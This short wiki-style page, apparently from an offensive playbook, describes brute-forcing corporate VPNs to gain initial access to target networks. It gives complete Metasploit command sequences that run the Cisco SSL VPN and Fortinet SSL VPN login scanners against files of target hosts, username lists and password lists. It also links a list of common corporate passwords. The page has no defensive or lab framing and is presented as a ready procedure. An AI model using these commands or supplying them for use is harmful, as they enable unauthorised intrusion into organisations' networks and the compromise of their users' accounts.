VPN brute forcing
Jump to navigation
Jump to search
Brute force common corporate VPNs to gain initial access to target networks. Install metasploit and then see Initial access TTPs for mass scanning ports.
CISCO
sudo systemctl start postgresql msfdb init msfconsole use auxiliary/scanner/http/cisco_ssl_vpn set RHOSTS file:/home/targets_443.txt set RPORT 443 set USER_FILE /home/users.txt set PASS_FILE /home/pass.txt set threads 10 run
FORTI SSL VPN
sudo systemctl start postgresql msfdb init msfconsole use auxiliary/scanner/http/fortinet_ssl_vpn set RHOSTS file:/home/targets_10443.txt set RPORT 10443 set USER_FILE /home/users.txt set PASS_FILE /home/pass.txt set threads 10 run
pass.txt: https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst